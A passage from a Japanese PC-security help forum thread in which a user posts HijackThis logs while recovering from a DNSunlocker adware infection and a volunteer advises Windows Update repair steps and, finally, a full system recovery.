C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11344 bytes
  • あすとろ
  • 2015/10/12 (Mon) 01:14:44
返信フォームへ 
MSの修復ツールを試しますか
こんばんは。
今日も遅くなりました。
気が付けばこのサイトで一番回答が少ない管理人になりました。
管理人らしく隅っこの掃除でもしてようと思います。
でも自室のお掃除は何が出てくるか怖いのでうかつに手を出せません(←ヲマエの部屋が一番の伏魔殿だ

>DL自体はできるのですがインストールしようとすると「オンラインにして必要なプログラムをインストールしてから、internet explorerのインストールページに戻ってセットアップを再度実行します」というポップアップが出てきてインストールができない状態です。

なるほど、IE11のDLはできてもインストールができないということですか。
つくづく妙な症状ですね。

ではMSの修復ツールを試してもらえますか。

下記のページから修復ツールの「Fix it」をダウンロードしてから、それを実行してください。
http://windows.microsoft.com/ja-JP/windows/troubleshoot-problems-installing-updates#1TC=windows-7

このFix itはWindowsでの各種トラブルをスキャンして、それを修復するためのものです。
ただ、これを使っても改善できないトラブルも多いので、その場合は感染の有無にかかわらず以後のPC安定運用の意味でリカバリするのが安全となります。
IEはWindowsのコアとなるプログラムのひとつで、それが更新できず脆弱性を抱えたままでは感染の危険も跳ね上がります。

まずは上記ツールを実行後、またIEの更新を試してから、その結果をレスください
  • 悪代官
  • 2015/10/12 (Mon) 21:08:59
返信フォームへ 
Re: DNSunlockerの感染
試してみましたがやはりアップデートはできないようです、以前にも書いたような気もしますがエラーコード:80070002と出ます。
  • あすとろ
  • 2015/10/14 (Wed) 02:14:34
返信フォームへ 
手動で更新プログラム削除も試しますか
今夜もレスが遅くなってすみません。

>試してみましたがやはりアップデートはできないようです、以前にも書いたような気もしますがエラーコード:80070002と出ます

うーん、とすると手動でMSサイト内の案内手順を試すことになりそうですが、これも成功の望みは薄いでしょうね。
一応下記のページを参考に試してみますか。
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

ここで「更新プログラム一時ファイルを削除するには」の項目に書かれている手順でSoftwareDistributionフォルダを探して、そこにあるファイルを削除したら再度更新を再試行して、その結果をレスもらえますか
  • 悪代官
  • 2015/10/14 (Wed) 21:04:29
返信フォームへ 
Re: DNSunlockerの感染
>一応下記のページを参考に試してみますか。
http://windows.microsoft.com/ja-jp/windows/windows-update-error-80070002#1TC=windows-7

ここで「更新プログラム一時ファイルを削除するには」の項目に書かれている手順でSoftwareDistributionフォルダを探して、そこにあるファイルを削除したら再度更新を再試行して、その結果をレスもらえますか


試してみましたが手応えなしでした、上記urlの下の方にあるスタンドアロンインストールも試していますがバーが動かず成功しているのか失敗しているのか分からない状態です。
  • あすとろ
  • 2015/10/16 (Fri) 02:40:11
返信フォームへ 
今夜も遅くなりました
今夜もまたレスが遅くなりました。

クリーンアップ後でも異常は続いているみたいですね。
本当にお手間ばかりかけながら改善なくてすみません。

>試してみましたが手応えなしでした、上記urlの下の方にあるスタンドアロンインストールも試していますがバーが動かず成功しているのか失敗しているのか分からない状態です。

ではお手数ですが、ここで再度HJTログだけ取り直して、それを見せていただけますか。
まだ更新できてないのかできているのかを含めて見直してみます
  • 悪代官
  • 2015/10/16 (Fri) 21:27:47
返信フォームへ 
Re: DNSunlockerの感染
こちらこそレスが遅くなりすみません。ウイルスの影響なのですかね…?

ともあれログを貼っていきます


Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 2:11:23, on 2015/10/18
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16659)

FIREFOX: 41.0.1 (x86 ja)
Boot mode: Normal

Running processes:
C:\Users\【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaConverter.exe
C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaRenderer.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Program Files (x86)\Janetter2\bin\janettersrv.exe
C:\Program Files (x86)\Janetter2\bin\Janetter.exe
C:\Users\【ユーザー名】\Downloads\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O1 - Hosts: 127.0.0.1 localhost
O1 - Hosts: ::1 localhost
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\ssv.dll
O2 - BHO: SkypeIEPluginBHO - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_60\bin\jp2ssv.dll
O4 - HKLM\..\Run: [SuiteTray] "C:\Program Files (x86)\EgisTec MyWinLockerSuite\x86\SuiteTray.exe"
O4 - HKLM\..\Run: [BackupManagerTray] "C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe" -h -k
O4 - HKLM\..\Run: [LManager] C:\Program Files (x86)\Launch Manager\LManager.exe
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
O4 - HKCU\..\Run: [Dropbox Update] "C:\Users\【ユーザー名】\AppData\Local\Dropbox\Update\DropboxUpdate.exe" /c
O4 - HKCU\..\Run: [CCleaner Monitoring] "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR
O4 - HKUS\S-1-5-18\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [IsMyWinLockerReboot] msiexec.exe /qn /x{voidguid} (User 'Default user')
O4 - Startup: Dropbox.lnk = 【ユーザー名】\AppData\Roaming\Dropbox\bin\Dropbox.exe
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O17 - HKLM\System\CCS\Services\Tcpip\..\{C678E09F-B902-4D1E-87D2-AE9B8DCDE689}: NameServer = 192.168.50.1
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Bonjour サービス (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Chrome リモート デスクトップ サービス (chromoting) - Google Inc. - C:\Program Files (x86)\Google\Chrome Remote Desktop\46.0.2490.13\remoting_host.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\Windows\SysWow64\IntelCpHeciSvc.exe
O23 - Service: DisplayLinkManager (DisplayLinkService) - DisplayLink Corp. - C:\Program Files\DisplayLink Core Software\DisplayLinkManager.exe
O23 - Service: Dritek WMI Service (DsiWMIService) - Dritek System Inc. - C:\Program Files (x86)\Launch Manager\dsiwmis.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\Windows\System32\lsass.exe (file missing)
O23 - Service: EgisTec Ticket Service - Egis Technology Inc. - C:\Program Files (x86)\Common Files\EgisTec\Services\EgisTicketService.exe
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\Windows\system32\fxssvc.exe (file missing)
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: @C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe,-100 (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: GREGService - Acer Incorporated - C:\Program Files (x86)\Acer\Registration\GREGsvc.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: LogMeIn Hamachi Tunneling Engine (Hamachi2Svc) - LogMeIn Inc. - C:\Program Files (x86)\LogMeIn Hamachi\hamachi-2.exe
O23 - Service: Intel(R) Rapid Storage Technology (IAStorDataMgrSvc) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Live Updater Service - Acer Incorporated - C:\Program Files\Acer\Acer Updater\UpdaterService.exe
O23 - Service: LMIGuardianSvc - LogMeIn, Inc. - C:\Program Files (x86)\LogMeIn Hamachi\LMIGuardianSvc.exe
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee McShield (McShield) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mcshield.exe
O23 - Service: McAfee Firewall Core Service (mfefire) - McAfee, Inc. - C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe
O23 - Service: McAfee Validation Trust Protection Service (mfevtp) - Unknown owner - C:\Windows\system32\mfevtps.exe (file missing)
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\Windows\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Norton Online Backup (NOBU) - Symantec Corporation - C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
O23 - Service: NTI IScheduleSvc - NTI Corporation - C:\Program Files (x86)\NTI\Acer Backup Manager\IScheduleSvc.exe
O23 - Service: Origin Client Service - Electronic Arts - C:\Program Files (x86)\Origin\OriginClientService.exe
O23 - Service: PnkBstrA - Unknown owner - C:\Windows\system32\PnkBstrA.exe
O23 - Service: @%systemroot%\system32\psbase.dll,-300 (ProtectedStorage) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\Windows\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: @%SystemRoot%\servicing\TrustedInstaller.exe,-100 (TrustedInstaller) - Unknown owner - C:\Windows\servicing\TrustedInstaller.exe (file missing)
O23 - Service: Intel(R) Turbo Boost Technology Monitor 2.5 (TurboBoost) - Intel(R) Corporation - C:\Program Files\Intel\TurboBoost\TurboBoost.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: Broadcom Wireless LAN Tray Service (wltrysvc) - Broadcom Corporation - C:\Program Files\Broadcom\Broadcom 802.11 Network Adapter\WLTRYSVC.EXE
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

--
End of file - 11500 bytes
  • あすとろ
  • 2015/10/18 (Sun) 02:24:28
返信フォームへ 
これ以上時間かけるのは避けるべきでしょう
こんばんは。
今夜もレスが遅くなってごめんなさい。

HJTログを見ましたが、やはり更新もできてないみたいですね。
>Platform: Windows 7 SP1 (WinNT 6.00.3505)
>MSIE: Internet Explorer v9.00 (9.00.8112.16659)

これ以上の時間浪費は避けるべきかもしれません。
最初に正直に報告してくれたP2Pのこともあるし、深刻な感染がまだ隠れていたら下手に時間かけているとその間にも傷口広げかねません。

残念ですが、必要なデータのバックアップができたら速やかにリカバリをお勧めします。

リカバリ後にまたWindowsやセキュリティソフト等も最新まで更新したら、そこでまたCCとHJTでの各ログを取り直して、それらを見せてもらえますか。

異常が見えなくなってもWindowsとそのコアプログラムでもあるIEの更新が正常にできないというのはそのまま継続使用するのは危険でしかありません。
感染ではなくWindowsのシステム破損の可能性もありますが、それとしてもやはりPCの安定使用上に不安が残るのは確かです。
安全優先ではリカバリ推奨ということになるので、まずはデータのバックアップからかかってください
  • 悪代官
  • 2015/10/18 (Sun) 21:01:03
返信フォームへ 
Re: DNSunlockerの感染
やはりリカバリしかないですかね…ただ必要なバックアップデータを取るほどの容量がある記憶媒体が今現在無い状態なので少し時間がかかります。

できるだけ早く調達して作業にかかりたいと思います。
  • あすとろ
  • 2015/10/20 (Tue) 00:17:37
返信フォームへ 
Re: DNSunlockerの感染
お久しぶりです、知人に外付けHDDを借りる予定であったのですが中々日程が合わず作業が遅れてしまいました。

私が作業をサボっていたせいもあり、報告が遅れてしまってすみませんでした。


無事にバックアップもとれ、リカバリが完了したのでログを張っていきます。


hjt------------------------------

Logfile of Trend Micro HijackThis v2.0.5
Scan saved at 5:12:19, on 2015/11/06
Platform: Windows 7 SP1 (WinNT 6.00.3505)
MSIE: Internet Explorer v9.00 (9.00.8112.16421)


Boot mode: Normal

Running processes:
C:\Program Files (x86)\NTI\Acer Backup Manager\BackupManagerTray.exe
C:\Program Files (x86)\Launch Manager\LManager.exe
C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe
C:\Users\【ユーザー名】\Desktop\HijackThis.exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
